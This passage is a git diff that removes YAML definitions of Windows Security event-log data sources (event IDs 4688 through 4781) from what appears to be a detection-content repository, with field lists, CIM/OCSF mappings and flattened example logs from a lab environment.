-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- PrivilegeList
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 4672001254800x8020000000000000148946Securityar-win-6.attackrange.localATTACKRANGE\REED_MORSEREED_MORSEATTACKRANGE0x509b11SeSecurityPrivilege
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4688.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4688.yml
deleted file mode 100644
index 68bc24ac07..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4688.yml
+++ /dev/null
@@ -1,113 +0,0 @@
-event_name: Windows Event Log Security 4688
-fields:
- - Caller_Domain
- - Caller_User_Name
- - Channel
- - CommandLine
- - Computer
- - Error_Code
- - EventCode
- - EventID
- - EventRecordID
- - Guid
- - Keywords
- - Level
- - Logon_ID
- - MandatoryLabel
- - Name
- - NewProcessId
- - NewProcessName
- - Opcode
- - ParentProcessName
- - ProcessID
- - Process_Command_Line
- - RecordNumber
- - SubjectDomainName
- - SubjectLogonId
- - SubjectUserName
- - SubjectUserSid
- - SystemTime
- - TargetDomainName
- - TargetLogonId
- - TargetUserName
- - TargetUserSid
- - Target_Domain
- - Target_User_Name
- - Task
- - ThreadID
- - TokenElevationType
- - Token_Elevation_Type
- - Token_Elevation_Type_id
- - Version
- - action
- - app
- - dest
- - dvc
- - dvc_nt_host
- - event_id
- - eventtype
- - id
- - name
- - new_process
- - new_process_id
- - new_process_name
- - parent_process
- - parent_process_id
- - parent_process_name
- - parent_process_path
- - process
- - process_command_line_arguments
- - process_command_line_process
- - process_exec
- - process_id
- - process_name
- - process_path
- - product
- - session_id
- - signature
- - signature_id
- - src_nt_domain
- - src_user
- - status
- - subject
- - ta_windows_action
- - tag
- - user
- - user_group
- - vendor
- - vendor_product
-field_mappings:
- - data_model: cim
- data_set: Endpoint.Processes
- mapping:
- NewProcessId: Processes.process_id
- NewProcessName: Processes.process_path
- NewProcessName|endswith: Processes.process_name
- Process_Command_Line: Processes.process
- SubjectUserSid: Processes.user
- ProcessId: Processes.parent_process_id
- ParentProcessName: Processes.parent_process_path
- ParentProcessName|endswith: Processes.parent_process_name
- Computer: Processes.dest
- - data_model: ocsf
- mapping:
- NewProcessId: process.pid
- NewProcessName: process.file.path
- NewProcessName|endswith: process.file.name
- Process_Command_Line: process.cmd_line
- SubjectUserSid: actor.user.name
- ProcessId: actor.process.pid
- ParentProcessName: actor.process.file.path
- ParentProcessName|endswith: actor.process.file.name
- Computer: device.hostname
-convert_to_log_source:
- - data_source: Sysmon Event ID 1
- mapping:
- NewProcessId: ProcessId #New_Process_ID in Hex
- NewProcessName: Image
- Process_Command_Line: CommandLine
- SubjectUserSid: User
- ProcessId: ParentProcessId
- ParentProcessName: ParentImage
- Computer: Computer
-example_log: 4688201331200x8020000000000000432820Securityar-win-1NT AUTHORITY\SYSTEMAR-WIN-1$WORKGROUP0x3e70xf84C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe%%19360xb2c"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4703.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4703.yml
deleted file mode 100644
index 01f3053449..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4703.yml
+++ /dev/null
@@ -1,91 +0,0 @@
-event_name: Windows Event Log Security 4703
-fields:
-- _time
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- DisabledPrivilegeList
-- EnabledPrivilegeList
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- ProcessId
-- ProcessName
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetLogonId
-- TargetUserName
-- TargetUserSid
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- object_id
-- process
-- process_id
-- process_name
-- process_path
-- product
-- punct
-- result
-- session_id
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- ta_windows_action
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_name
-- vendor
-- vendor_product
-example_log: 4703001331700x8020000000000000328761Securitywin-host-ctus-attack-range-115WIN-HOST-CTUS-A\AdministratorAdministratorWIN-HOST-CTUS-A0x288b91WIN-HOST-CTUS-A\AdministratorAdministratorWIN-HOST-CTUS-A0x288b91C:\Temp\poc_2\c2_agent.exe0x570SeDebugPrivilege-
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4719.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4719.yml
deleted file mode 100644
index 16863baaf7..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4719.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: Windows Event Log Security 4719
-fields:
-- _time
-- ActivityID
-- AuditPolicyChanges
-- Caller_Domain
-- Caller_User_Name
-- CategoryId
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubcategoryGuid
-- SubcategoryId
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_attrs
-- object_category
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 4719001356800x8020000000000000353597Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e7%%8276%%13312{0CCE922B-69AE-11D9-BED3-505054503030}%%8448, %%8450
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4724.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4724.yml
deleted file mode 100644
index af5ec16c03..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4724.yml
+++ /dev/null
@@ -1,87 +0,0 @@
-event_name: Windows Event Log Security 4724
-fields:
-- _time
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object
-- object_attrs
-- object_category
-- object_id
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_name
-- vendor
-- vendor_product
-example_log: 4724001382400x8020000000000000276779Securityar-win-dc.attackrange.localTRUMAN_CLEMENTSATTACKRANGEATTACKRANGE\TRUMAN_CLEMENTSATTACKRANGE\AdministratorAdministratorATTACKRANGE0x592d1
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4725.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4725.yml
deleted file mode 100644
index 67740b57e0..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4725.yml
+++ /dev/null
@@ -1,87 +0,0 @@
-event_name: Windows Event Log Security 4725
-fields:
-- _time
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object
-- object_attrs
-- object_category
-- object_id
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_name
-- vendor
-- vendor_product
-example_log: 4725001382400x8020000000000000278771Securityar-win-dc.attackrange.localWILFORD_SUTTONATTACKRANGEATTACKRANGE\WILFORD_SUTTONATTACKRANGE\AdministratorAdministratorATTACKRANGE0x592d1
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4726.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4726.yml
deleted file mode 100644
index fef4ed448a..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4726.yml
+++ /dev/null
@@ -1,88 +0,0 @@
-event_name: Windows Event Log Security 4726
-fields:
-- _time
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- PrivilegeList
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object
-- object_attrs
-- object_category
-- object_id
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_name
-- vendor
-- vendor_product
-example_log: 4726001382400x8020000000000000279283Securityar-win-dc.attackrange.localLYNN_WOLFATTACKRANGES-1-5-21-2851375338-1978525053-2422663219-2445ATTACKRANGE\AdministratorAdministratorATTACKRANGE0x592d1-
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4738.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4738.yml
deleted file mode 100644
index 34da3484ea..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4738.yml
+++ /dev/null
@@ -1,107 +0,0 @@
-event_name: Windows Event Log Security 4738
-fields:
-- _time
-- AccountExpires
-- AllowedToDelegateTo
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- DisplayName
-- Dummy
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- HomeDirectory
-- HomePath
-- Keywords
-- Level
-- LogonHours
-- Logon_ID
-- Name
-- NewUacValue
-- OldUacValue
-- Opcode
-- PasswordLastSet
-- PrimaryGroupId
-- PrivilegeList
-- ProcessID
-- ProfilePath
-- RecordNumber
-- SamAccountName
-- ScriptPath
-- SidHistory
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- UserAccountControl
-- UserParameters
-- UserPrincipalName
-- UserWorkstations
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object
-- object_attrs
-- object_category
-- object_id
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_name
-- vendor
-- vendor_product
-example_log: 4738001382400x80200000000000006389713Securityar-win-dc.attackrange.local-unprivATTACKRANGES-1-5-21-945660386-2529346225-2932127451-1112S-1-5-21-945660386-2529346225-2932127451-500AdministratorATTACKRANGE0x54bb3a-----------------
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4739.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4739.yml
deleted file mode 100644
index 7743880eae..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4739.yml
+++ /dev/null
@@ -1,94 +0,0 @@
-event_name: Windows Event Log Security 4739
-fields:
-- _time
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- DomainBehaviorVersion
-- DomainName
-- DomainPolicyChanged
-- DomainSid
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- ForceLogoff
-- Guid
-- Keywords
-- Level
-- LockoutDuration
-- LockoutObservationWindow
-- LockoutThreshold
-- Logon_ID
-- MachineAccountQuota
-- MaxPasswordAge
-- MinPasswordAge
-- MinPasswordLength
-- MixedDomainMode
-- Name
-- OemInformation
-- Opcode
-- PasswordHistoryLength
-- PasswordProperties
-- PrivilegeList
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_attrs
-- object_category
-- product
-- punct
-- result
-- session_id
-- severity
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 4739001356900x8020000000000000394176Securityar-win-dc.attackrange.localLockout PolicyATTACKRANGEATTACKRANGE\NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e7----1---------
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4741.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4741.yml
deleted file mode 100644
index 125d12d773..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4741.yml
+++ /dev/null
@@ -1,105 +0,0 @@
-event_name: Windows Event Log Security 4741
-fields:
-- _time
-- AccountExpires
-- AllowedToDelegateTo
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- DisplayName
-- DnsHostName
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- HomeDirectory
-- HomePath
-- Keywords
-- Level
-- LogonHours
-- Logon_ID
-- Name
-- NewUacValue
-- OldUacValue
-- Opcode
-- PasswordLastSet
-- PrimaryGroupId
-- PrivilegeList
-- ProcessID
-- ProfilePath
-- RecordNumber
-- SamAccountName
-- ScriptPath
-- ServicePrincipalNames
-- SidHistory
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- UserAccountControl
-- UserParameters
-- UserPrincipalName
-- UserWorkstations
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_attrs
-- object_category
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_type
-- vendor
-- vendor_product
-example_log: 4741001382500x8020000000000000143475Securityar-win-dc.attackrange.localAR-WIN-2$ATTACKRANGEATTACKRANGE\AR-WIN-2$ATTACKRANGE\AdministratorAdministratorATTACKRANGE0xd9f04-AR-WIN-2$-------4/8/2024 6:48:04 PM%%1794515-0x00x80
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4742.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4742.yml
deleted file mode 100644
index 6ca72500e1..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4742.yml
+++ /dev/null
@@ -1,106 +0,0 @@
-event_name: Windows Event Log Security 4742
-fields:
-- _time
-- AccountExpires
-- AllowedToDelegateTo
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- ComputerAccountChange
-- DisplayName
-- DnsHostName
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- HomeDirectory
-- HomePath
-- Keywords
-- Level
-- LogonHours
-- Logon_ID
-- Name
-- NewUacValue
-- OldUacValue
-- Opcode
-- PasswordLastSet
-- PrimaryGroupId
-- PrivilegeList
-- ProcessID
-- ProfilePath
-- RecordNumber
-- SamAccountName
-- ScriptPath
-- ServicePrincipalNames
-- SidHistory
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- UserAccountControl
-- UserParameters
-- UserPrincipalName
-- UserWorkstations
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object_attrs
-- object_category
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_type
-- vendor
-- vendor_product
-example_log: 4742001382500x8020000000000000901860Securitywin-dc-root-04195-428.attackrange.local-WIN-HOST-ROOT-0$ATTACKRANGES-1-5-21-199921393-3534762603-6736986-1111S-1-5-21-199921393-3534762603-6736986-500AdministratorATTACKRANGE0x177304-----------------
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4768.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4768.yml
deleted file mode 100644
index 6cc2b321a0..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4768.yml
+++ /dev/null
@@ -1,86 +0,0 @@
-event_name: Windows Event Log Security 4768
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- IpAddress
-- IpPort
-- Keywords
-- Level
-- Name
-- Opcode
-- PreAuthType
-- ProcessID
-- RecordNumber
-- ServiceName
-- ServiceSid
-- Source_Port
-- Source_Workstation
-- Status
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- TicketEncryptionType
-- TicketOptions
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- service
-- service_id
-- service_name
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_nt_host
-- src_port
-- status
-- subject
-- ta_windows_action
-- ta_windows_status
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: 4768001433900x8010000000000000391562Securitywin-dc-mvelazco-02713-392.attackrange.localRXETPKZHattackrange.localNULL SIDkrbtgt/attackrange.localNULL SID0x408100100x120xffffffff-::ffff:10.0.1.1564568
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4769.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4769.yml
deleted file mode 100644
index 250fe32850..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4769.yml
+++ /dev/null
@@ -1,86 +0,0 @@
-event_name: Windows Event Log Security 4769
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- IpAddress
-- IpPort
-- Keywords
-- Level
-- LogonGuid
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- ServiceName
-- ServiceSid
-- Source_Port
-- Source_Workstation
-- Status
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- TicketEncryptionType
-- TicketOptions
-- TransmittedServices
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- service
-- service_id
-- service_name
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_nt_host
-- src_port
-- status
-- subject
-- ta_windows_action
-- ta_windows_status
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: 4769001433700x8020000000000000148521Securityar-win-dc.attackrange.localAR-WIN-2$@ATTACKRANGE.LOCALATTACKRANGE.LOCALAR-WIN-2$ATTACKRANGE\AR-WIN-2$0x408100000x17::ffff:10.0.1.15591910x0{3b4ad75b-7184-6094-b975-ea3f91932ee0}-
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4771.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4771.yml
deleted file mode 100644
index a64772d5a6..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4771.yml
+++ /dev/null
@@ -1,80 +0,0 @@
-event_name: Windows Event Log Security 4771
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- IpAddress
-- IpPort
-- Keywords
-- Level
-- Name
-- Opcode
-- PreAuthType
-- ProcessID
-- RecordNumber
-- ServiceName
-- Source_Port
-- Source_Workstation
-- Status
-- SystemTime
-- System_Props_Xml
-- TargetSid
-- TargetUserName
-- Target_User_Name
-- Task
-- ThreadID
-- TicketOptions
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- service
-- service_name
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_nt_host
-- src_port
-- status
-- subject
-- ta_windows_action
-- ta_windows_status
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: 4771001433900x8010000000000000391511Securitywin-dc-mvelazco-02713-392.attackrange.localALLISON_WATERSATTACKRANGE\ALLISON_WATERSkrbtgt/attackrange.local0x408100100x182::ffff:10.0.1.1564134
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4776.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4776.yml
deleted file mode 100644
index fc5142b47c..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4776.yml
+++ /dev/null
@@ -1,71 +0,0 @@
-event_name: Windows Event Log Security 4776
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- PackageName
-- ProcessID
-- RecordNumber
-- Source_Workstation
-- Status
-- SystemTime
-- System_Props_Xml
-- TargetUserName
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- Workstation
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_nt_host
-- status
-- subject
-- ta_windows_action
-- ta_windows_status
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: 4776001433600x8010000000000000391615Securitywin-dc-mvelazco-02713-392.attackrange.localMICROSOFT_AUTHENTICATION_PACKAGE_V1_0KSYLEFUAWIN-HOST-MVELAZ0xc0000064
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4781.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4781.yml
deleted file mode 100644
index 26de808b1b..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4781.yml
+++ /dev/null
@@ -1,88 +0,0 @@
-event_name: Windows Event Log Security 4781
-fields:
-- _time
-- ActivityID
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- NewTargetUserName
-- OldTargetUserName
-- Opcode
-- PrivilegeList
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- Target_Domain
-- Task
-- ThreadID
-- Version
-- action
-- app
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- object
-- object_attrs
-- object_category
-- object_id
-- product
-- punct
-- result
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_name
-- vendor
-- vendor_product
